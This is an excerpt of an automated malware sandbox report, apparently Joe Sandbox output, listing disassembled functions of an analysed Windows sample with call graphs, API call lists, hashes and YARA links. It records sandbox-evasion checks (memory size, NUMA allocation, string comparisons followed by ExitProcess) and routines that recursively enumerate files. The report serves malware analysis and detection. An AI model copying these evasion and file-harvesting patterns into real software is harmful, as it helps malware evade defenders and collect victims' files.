                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: ERROR
                              • API String ID: 3722407311-2861137601
                              • Opcode ID: 9a300a79ce76f36765af4b9e9e8c21a029aec1d74a3c782b750b43e34e68df02
                              • Instruction ID: df3d9356f4eca90fabe3f1d9947dc4db00a75aca862b7f55f5237581c9c6609b
                              • Opcode Fuzzy Hash: 9a300a79ce76f36765af4b9e9e8c21a029aec1d74a3c782b750b43e34e68df02
                              • Instruction Fuzzy Hash: 38210E70626246DBDB61FF79DC4ABDA37A4AF14300F04942CBC4AEB253DA38EC018790
                              Function 007B10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2547 7b10c0-7b10cb 2548 7b10d0-7b10dc 2547->2548 2550 7b10de-7b10f3 GlobalMemoryStatusEx 2548->2550 2551 7b1112-7b1114 ExitProcess 2550->2551 2552 7b10f5-7b1106 2550->2552 2553 7b111a-7b111d 2552->2553 2554 7b1108 2552->2554 2554->2551 2555 7b110a-7b1110 2554->2555 2555->2551 2555->2553
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: c684ce56c5e9e8974add5b49182b4cb71d3b78d15dddb1ba33ed01e24173847c
                              • Instruction ID: 8085f306b664a3cc63e317abea8fd7d678cba3bd500e7f42c080f572f007f6f1
                              • Opcode Fuzzy Hash: c684ce56c5e9e8974add5b49182b4cb71d3b78d15dddb1ba33ed01e24173847c
                              • Instruction Fuzzy Hash: F2F05C7011C28C4BEB10BA6CDC6A3ADF7D8EB01350FE00929DE9BC2182F238CC509127
                              Function 007C8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2556 7c8c88-7c8cc4 StrCmpCA 2558 7c8ccd-7c8ce6 2556->2558 2559 7c8cc6-7c8cc7 ExitProcess 2556->2559 2561 7c8cec-7c8cf1 2558->2561 2562 7c8ee2-7c8eef call 7b2a20 2558->2562 2564 7c8cf6-7c8cf9 2561->2564 2566 7c8cff 2564->2566 2567 7c8ec3-7c8edc 2564->2567 2568 7c8dbd-7c8dcb StrCmpCA 2566->2568 2569 7c8ddd-7c8deb StrCmpCA 2566->2569 2570 7c8dfd-7c8e0b StrCmpCA 2566->2570 2571 7c8e1d-7c8e2b StrCmpCA 2566->2571 2572 7c8e3d-7c8e4b StrCmpCA 2566->2572 2573 7c8d5a-7c8d69 lstrlen 2566->2573 2574 7c8e56-7c8e64 StrCmpCA 2566->2574 2575 7c8d30-7c8d3f lstrlen 2566->2575 2576 7c8e6f-7c8e7d StrCmpCA 2566->2576 2577 7c8e88-7c8e9a lstrlen 2566->2577 2578 7c8d84-7c8d92 StrCmpCA 2566->2578 2579 7c8da4-7c8db8 StrCmpCA 2566->2579 2580 7c8d06-7c8d15 lstrlen 2566->2580 2567->2562 2598 7c8cf3 2567->2598 2568->2567 2583 7c8dd1-7c8dd8 2568->2583 2569->2567 2584 7c8df1-7c8df8 2569->2584 2570->2567 2585 7c8e11-7c8e18 2570->2585 2571->2567 2586 7c8e31-7c8e38 2571->2586 2572->2567 2587 7c8e4d-7c8e54 2572->2587 2596 7c8d6b-7c8d70 call 7b2a20 2573->2596 2597 7c8d73-7c8d7f call 7b2930 2573->2597 2574->2567 2590 7c8e66-7c8e6d 2574->2590 2594 7c8d49-7c8d55 call 7b2930 2575->2594 2595 7c8d41-7c8d46 call 7b2a20 2575->2595 2576->2567 2591 7c8e7f-7c8e86 2576->2591 2592 7c8e9c-7c8ea1 call 7b2a20 2577->2592 2593 7c8ea4-7c8eb0 call 7b2930 2577->2593 2578->2567 2582 7c8d98-7c8d9f 2578->2582 2579->2567 2588 7c8d1f-7c8d2b call 7b2930 2580->2588 2589 7c8d17-7c8d1c call 7b2a20 2580->2589 2582->2567 2583->2567 2584->2567 2585->2567 2586->2567 2587->2567 2615 7c8eb3-7c8eb5 2588->2615 2589->2588 2590->2567 2591->2567 2592->2593 2593->2615 2594->2615 2595->2594 2596->2597 2597->2615 2598->2564 2615->2567 2616 7c8eb7-7c8eb9 2615->2616 2616->2567 2617 7c8ebb-7c8ebd lstrcpy 2616->2617 2617->2567
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 650a97de59e0a6dcd28bc28c5cbdf775ffc420abc5c839facf63ac0fd46f8673
                              • Instruction ID: 659c96c844014a9eae313833f59156b9b76618f3fefe874ea94970e0edde9882
                              • Opcode Fuzzy Hash: 650a97de59e0a6dcd28bc28c5cbdf775ffc420abc5c839facf63ac0fd46f8673
                              • Instruction Fuzzy Hash: 43E09279015348EFCB34DBA5C884C2A7769EF88305B06005CEA006F762DA30FD01C7A6
                              Function 007D2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2618 7d2ad0-7d2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2619 7d2b44-7d2b59 2618->2619 2620 7d2b24-7d2b36 2618->2620
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007D2AFF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D2B06
                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 007D2B1A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: d4bebbc9d0876ad81d78a604e72a43128a2031d880a48cf4775e4722232f7ebf
                              • Instruction ID: 750dbe903dbdc439811ed2bffc5e2af94c72a6c0fbe1accff899c6b1f19c5a32
                              • Opcode Fuzzy Hash: d4bebbc9d0876ad81d78a604e72a43128a2031d880a48cf4775e4722232f7ebf
                              • Instruction Fuzzy Hash: CB01D6B2A44248ABC710DF99EC85B9DF7B8F745B22F00026BF915D3780D778190087A1
                              Function 007B100D Relevance: 4.5, APIs: 3, Instructions: 32memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B1046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 007B104D
                              • ExitProcess.KERNEL32 ref: 007B1058
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: f0b0152ea2adccaf57d99363d7a38833a4e27ec03ec0607fe448d2e869ca5392
                              • Instruction ID: 3e68c3ac0847ef78dca0340e2346737282e0c36579616e4f16bff025f98b06b9
                              • Opcode Fuzzy Hash: f0b0152ea2adccaf57d99363d7a38833a4e27ec03ec0607fe448d2e869ca5392
                              • Instruction Fuzzy Hash: 5DE0C2B068C3C4BFEB2117615C9EF163E2CAB22B06F804004F705AE0D1E6E8A900A775

                              Non-executed Functions

                              Function 007C2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C23D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C23F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C2402
                              • lstrlen.KERNEL32(\*.*), ref: 007C240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 007C2436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C2486
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: d5cb819a78a6b370f60f802d14184e4754617671e8f9557f33bbc129b51debeb
                              • Instruction ID: a8b12fea42886207de98c4c52780fe0d5d0f60796e7c470f1f69817b6b00df30
                              • Opcode Fuzzy Hash: d5cb819a78a6b370f60f802d14184e4754617671e8f9557f33bbc129b51debeb
                              • Instruction Fuzzy Hash: C5A27F71916656DBDB21AF78DC89FAE77B9AF04700F04816CB809E7252DB38DD428B90
                              Function 007B16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B16E2
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B176C
                              • lstrcat.KERNEL32(00000000), ref: 007B1776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B17A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B17EF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B17F9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1825
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1875
                              • lstrcat.KERNEL32(00000000), ref: 007B187F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B18AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B18F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B18FE
                              • lstrlen.KERNEL32(007E1794), ref: 007B1909
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1929
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1935
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B195B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1966
                              • lstrlen.KERNEL32(\*.*), ref: 007B1971
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B198E
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 007B199A
                                • Part of subcall function 007D4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 007D406D
                                • Part of subcall function 007D4040: lstrcpy.KERNEL32(00000000,?), ref: 007D40A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B19C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1A0E
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1A16
                              • lstrlen.KERNEL32(007E1794), ref: 007B1A21
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1A41
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1A4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1A76
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1A81
                              • lstrlen.KERNEL32(007E1794), ref: 007B1A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1AAC
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1AB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1ADE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1AE9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1B11
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007B1B45
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007B1B70
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007B1B8A
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1BC4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1BFB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1C03
                              • lstrlen.KERNEL32(007E1794), ref: 007B1C0E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1C31
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1C3D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1C69
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1C74
                              • lstrlen.KERNEL32(007E1794), ref: 007B1C7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1CA2
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1CAE
                              • lstrlen.KERNEL32(?), ref: 007B1CBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1CDB
                              • lstrcat.KERNEL32(00000000,?), ref: 007B1CE9
                              • lstrlen.KERNEL32(007E1794), ref: 007B1CF4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1D14
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1D20
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1D46
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1D51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1D7D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1DE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1DEB
                              • lstrlen.KERNEL32(007E1794), ref: 007B1DF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1E19
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1E25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1E4B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B1E56
                              • lstrlen.KERNEL32(007E1794), ref: 007B1E61
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1E81
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B1E8D
                              • lstrlen.KERNEL32(?), ref: 007B1E9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1EBA
                              • lstrcat.KERNEL32(00000000,?), ref: 007B1EC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1EF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1F3E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007B1F45
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1F9F
                              • lstrlen.KERNEL32(01458B08), ref: 007B1FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 007B1FE3
                              • lstrlen.KERNEL32(007E1794), ref: 007B1FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B200E
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B2042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B204D
                              • lstrlen.KERNEL32(007E1794), ref: 007B2058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2075
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B2081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                              • String ID: \*.*
                              • API String ID: 4127656590-1173974218
                              • Opcode ID: 35f62ff9fc82ba698b1bdbc995aa87beeaa8e20406e21768edf0ff1b2342167a
                              • Instruction ID: 7868125f61dbcfa136c17404cf8a343f1301d12e6436792cdc53dce9017cdcae
                              • Opcode Fuzzy Hash: 35f62ff9fc82ba698b1bdbc995aa87beeaa8e20406e21768edf0ff1b2342167a
                              • Instruction Fuzzy Hash: D9927271916256DBDB21EF64DC89BEE77B9AF44700F854124F809B7252DB38ED02CBA0
                              Function 007BDB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDBEF
                              • lstrlen.KERNEL32(007E4CA8), ref: 007BDBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDC17
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007BDC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDC4C
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDC8F
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007BDCD0
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007BDCF0
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007BDD0A
                              • lstrlen.KERNEL32(007DCFEC), ref: 007BDD1D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BDD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDD7B
                              • lstrlen.KERNEL32(007E1794), ref: 007BDD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDDA3
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDDAF
                              • lstrlen.KERNEL32(?), ref: 007BDDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 007BDDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDE19
                              • lstrlen.KERNEL32(007E1794), ref: 007BDE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BDE6F
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDE7B
                              • lstrlen.KERNEL32(014587F8), ref: 007BDE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDEBB
                              • lstrlen.KERNEL32(007E1794), ref: 007BDEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 007BDEE6
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007BDEF2
                              • lstrlen.KERNEL32(01458AA8), ref: 007BDF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BDF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BDF32
